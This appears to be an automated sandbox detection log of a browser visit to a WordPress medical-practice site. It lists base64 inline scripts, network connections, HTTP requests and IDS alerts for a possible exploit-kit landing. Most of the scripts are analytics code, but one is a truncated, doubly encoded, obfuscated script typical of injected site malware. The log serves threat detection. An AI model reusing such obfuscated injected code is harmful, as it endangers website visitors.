Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQogIHdpbmRvdy5kYXRhTGF5ZXIgPSB3aW5kb3cuZGF0YUxheWVyIHx8IFtdOw0KICBmdW5jdGlvbiBndGFnKCl7ZGF0YUxheWVyLnB1c2goYXJndW1lbnRzKTt9DQogIGd0YWcoJ2pzJywgbmV3IERhdGUoKSk7DQoNCiAgZ3RhZygnY29uZmlnJywgJ0FXLTExMDYwNzUwMjg3Jyk7DQo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQpmdW5jdGlvbiBndGFnX3JlcG9ydF9jb252ZXJzaW9uKHVybCkgew0KICB2YXIgY2FsbGJhY2sgPSBmdW5jdGlvbiAoKSB7DQogICAgaWYgKHR5cGVvZih1cmwpICE9ICd1bmRlZmluZWQnKSB7DQogICAgICB3aW5kb3cubG9jYXRpb24gPSB1cmw7DQogICAgfQ0KICB9Ow0KICBndGFnKCdldm
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2xvYWQnLCBmdW5jdGlvbigpIHsNCiAgdmFyIGtleSA9ICc5NkFDMDE0QS03NkFGLTRDQjgtQUM1Ri05RTdFRjZFMDk3NjUnOw0KICBPaE1EV2lkZ2V0LmluaXRpYWxpemUoa2V5KTsNCn0pOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmNyd3BWZXIgPSAxOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgY29ibG9ja3NUaW55c3dpcGVyID0geyJjYXJvdXNlbFByZXZCdXR0b25BcmlhTGFiZWwiOiJQcmV2aW91cyIsImNhcm91c2VsTmV4dEJ1dHRvbkFyaWFMYWJlbCI6Ik5leHQiLCJzbGlkZXJJbWFnZUFyaWFMYWJlbCI6IkltYWdlIn07Ci8qIF1dPiAqLwo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgcGhwX3ZhcnMgPSB7ImJhbm5lcl9hbmltYXRpb25fY2xhc3MiOiJub25lIiwiYnV0dG9uX2FuaW1hdGlvbl9jbGFzcyI6InB1bHNlIiwiY2FsbG91dF9hbmltYXRpb25fY2xhc3MiOiJub25lIiwibGlua19pY29ucyI6IjEifTsKLyogXV0+ICovCg==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKCQsIHJvb3QsIHVuZGVmaW5lZCkgeyAkKGZ1bmN0aW9uKCkgeyANCiAgICAgICAgICAgICAgICAgICAgICAgICQoJyNwcmFjdGlzX3BvcHVwc18zNDM2JykucG9wdXAoew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNldHppbmRleDogdHJ1ZSwNCiAgICAgICAgICAgIC
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZxIHx8ICh3aW5kb3cuX3RyZnEgPSBbXSk7J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZkICYmICh3aW5kb3cuX3RyZmQ9W10pLAogICAgICAgICAgICAgICAgX3RyZmQucHVzaCh7J3RjY2wuYmFzZUhvc3QnOidzZWN1cmVzZXJ2ZXIubmV0J30pLA
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2NsaWNrJywgZnVuY3Rpb24gKGVsZW0pIHsgdmFyIF9lbGVtJHRhcmdldCwgX2VsZW0kdGFyZ2V0JGRhdGFzZXQsIF93aW5kb3csIF93aW5kb3ckX3RyZnE7IHJldHVybiAoZWxlbSA9PT0gbnVsbCB8fCBlbGVtID09PSB2b2lkIDAgPyB2b2lkIDAgOi
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,SVNWYUY9IlpuVnVZM1JwYjI0Z1NpaDZMR01wZTJOdmJuTjBJRVU5YnlncE8zSmxkSFZ5YmlCS1BXWjFibU4wYVc5dUtFWXNWaWw3UmoxR0xTZ3RNSGczS2kwd2VEUmtOaXN3ZUdZNFlTc3RNSGd6TURJMktqQjRNU2s3YkdWMElFSTlSVnRHWFR0eVpYUjFjbTRnUWp0OUxFb29laXhqS1R0OUtHWj
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQogIHdpbmRvdy5kYXRhTGF5ZXIgPSB3aW5kb3cuZGF0YUxheWVyIHx8IFtdOw0KICBmdW5jdGlvbiBndGFnKCl7ZGF0YUxheWVyLnB1c2goYXJndW1lbnRzKTt9DQogIGd0YWcoJ2pzJywgbmV3IERhdGUoKSk7DQoNCiAgZ3RhZygnY29uZmlnJywgJ0FXLTExMDYwNzUwMjg3Jyk7DQo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,DQpmdW5jdGlvbiBndGFnX3JlcG9ydF9jb252ZXJzaW9uKHVybCkgew0KICB2YXIgY2FsbGJhY2sgPSBmdW5jdGlvbiAoKSB7DQogICAgaWYgKHR5cGVvZih1cmwpICE9ICd1bmRlZmluZWQnKSB7DQogICAgICB3aW5kb3cubG9jYXRpb24gPSB1cmw7DQogICAgfQ0KICB9Ow0KICBndGFnKCdldm
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKHcsZCxzLGwsaSl7d1tsXT13W2xdfHxbXTt3W2xdLnB1c2goeydndG0uc3RhcnQnOg0KbmV3IERhdGUoKS5nZXRUaW1lKCksZXZlbnQ6J2d0bS5qcyd9KTt2YXIgZj1kLmdldEVsZW1lbnRzQnlUYWdOYW1lKHMpWzBdLA0Kaj1kLmNyZWF0ZUVsZW1lbnQocyksZGw9bCE9J2RhdG
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2xvYWQnLCBmdW5jdGlvbigpIHsNCiAgdmFyIGtleSA9ICc5NkFDMDE0QS03NkFGLTRDQjgtQUM1Ri05RTdFRjZFMDk3NjUnOw0KICBPaE1EV2lkZ2V0LmluaXRpYWxpemUoa2V5KTsNCn0pOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmNyd3BWZXIgPSAxOw==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgY29ibG9ja3NUaW55c3dpcGVyID0geyJjYXJvdXNlbFByZXZCdXR0b25BcmlhTGFiZWwiOiJQcmV2aW91cyIsImNhcm91c2VsTmV4dEJ1dHRvbkFyaWFMYWJlbCI6Ik5leHQiLCJzbGlkZXJJbWFnZUFyaWFMYWJlbCI6IkltYWdlIn07Ci8qIF1dPiAqLwo=
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,Ci8qIDwhW0NEQVRBWyAqLwp2YXIgcGhwX3ZhcnMgPSB7ImJhbm5lcl9hbmltYXRpb25fY2xhc3MiOiJub25lIiwiYnV0dG9uX2FuaW1hdGlvbl9jbGFzcyI6InB1bHNlIiwiY2FsbG91dF9hbmltYXRpb25fY2xhc3MiOiJub25lIiwibGlua19pY29ucyI6IjEifTsKLyogXV0+ICovCg==
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,KGZ1bmN0aW9uKCQsIHJvb3QsIHVuZGVmaW5lZCkgeyAkKGZ1bmN0aW9uKCkgeyANCiAgICAgICAgICAgICAgICAgICAgICAgICQoJyNwcmFjdGlzX3BvcHVwc18zNDM2JykucG9wdXAoew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNldHppbmRleDogdHJ1ZSwNCiAgICAgICAgICAgIC
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZxIHx8ICh3aW5kb3cuX3RyZnEgPSBbXSk7J3VuZGVmaW5lZCc9PT0gdHlwZW9mIF90cmZkICYmICh3aW5kb3cuX3RyZmQ9W10pLAogICAgICAgICAgICAgICAgX3RyZmQucHVzaCh7J3RjY2wuYmFzZUhvc3QnOidzZWN1cmVzZXJ2ZXIubmV0J30pLA
Source: https://mipscenter.com/HTTP Parser: Script src: data:text/javascript;base64,d2luZG93LmFkZEV2ZW50TGlzdGVuZXIoJ2NsaWNrJywgZnVuY3Rpb24gKGVsZW0pIHsgdmFyIF9lbGVtJHRhcmdldCwgX2VsZW0kdGFyZ2V0JGRhdGFzZXQsIF93aW5kb3csIF93aW5kb3ckX3RyZnE7IHJldHVybiAoZWxlbSA9PT0gbnVsbCB8fCBlbGVtID09PSB2b2lkIDAgPyB2b2lkIDAgOi
Source: https://mipscenter.com/HTTP Parser: No favicon
Source: https://mipscenter.com/HTTP Parser: No favicon
Source: https://mipscenter.com/HTTP Parser: No favicon
Source: https://mipscenter.com/HTTP Parser: No favicon
Source: https://mipscenter.com/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 160.153.0.94:443 -> 192.168.2.17:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 160.153.0.94:443 -> 192.168.2.17:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 160.153.0.94:443 -> 192.168.2.17:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.206.37.78:443 -> 192.168.2.17:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 160.153.0.94:443 -> 192.168.2.17:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 160.153.0.94:443 -> 192.168.2.17:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.33.252.15:443 -> 192.168.2.17:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.209.72.207:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 199.232.89.229:443 -> 192.168.2.17:49762 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.17:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.17:49781 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.80.34:443 -> 192.168.2.17:49782 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.32.98:443 -> 192.168.2.17:49783 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.17:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.17:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.81.238:443 -> 192.168.2.17:49826 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.0.77.2:443 -> 192.168.2.17:49825 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.71.137.105:443 -> 192.168.2.17:49824 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.111.154:443 -> 192.168.2.17:49829 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.65.214:443 -> 192.168.2.17:49839 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.0.77.2:443 -> 192.168.2.17:49844 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.111.155:443 -> 192.168.2.17:49843 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.71.137.105:443 -> 192.168.2.17:49846 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.32.98:443 -> 192.168.2.17:49852 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.176.198:443 -> 192.168.2.17:49853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.132:443 -> 192.168.2.17:49854 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.80.33:443 -> 192.168.2.17:49857 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.64.118:443 -> 192.168.2.17:49862 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.80.33:443 -> 192.168.2.17:49863 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.142:443 -> 192.168.2.17:49866 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.48.224.108:443 -> 192.168.2.17:49877 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.48.224.108:443 -> 192.168.2.17:49878 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.201.191.59:443 -> 192.168.2.17:49880 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.201.191.59:443 -> 192.168.2.17:49879 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.32.98:443 -> 192.168.2.17:49886 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.48.224.108:443 -> 192.168.2.17:49891 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.251.40.238:443 -> 192.168.2.17:49892 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.48.224.108:443 -> 192.168.2.17:49890 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.206.37.78:443 -> 192.168.2.17:49895 version: TLS 1.2
Source: unknownHTTPS traffic detected: 18.206.37.78:443 -> 192.168.2.17:49904 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.17:49908 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.17:49934 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.17:49958 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 6MB later: 38MB
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.17:49877 -> 23.48.224.108:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.17:49878 -> 23.48.224.108:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.17:49890 -> 23.48.224.108:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.17:49891 -> 23.48.224.108:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.17:49967 -> 23.48.224.108:443
Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.17:49960 -> 23.48.224.108:443
Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_4272f4f016405eab091b0b7a96715832.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/css/dist/components/style.min.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_0793ca35f5d388181a5e6c01688af110.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_ad34bf64095d41b275a906520ae9f961.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_af9c7a15ed7204fbb889e056764bc429.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_54db845a8c1c9c5a52029d24e0141f76.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /main.js HTTP/1.1Host: services.ohmd.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/css/frontend-icon-style.min.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/mypractis/modules/practis-wysiwyg-icons/third-party/animate.min.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_53f1dc6612cff59f6b2f009dea07397a.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_902edd9f8303a0e7c9be4bf721669a29.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_55ef45e593ebdf6ba97abd22330755d5.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/cache/autoptimize/css/autoptimize_single_a84aefbe1669acc7199e3303ac52a4b0.css HTTP/1.1Host: mipscenter.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://mipscenter.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
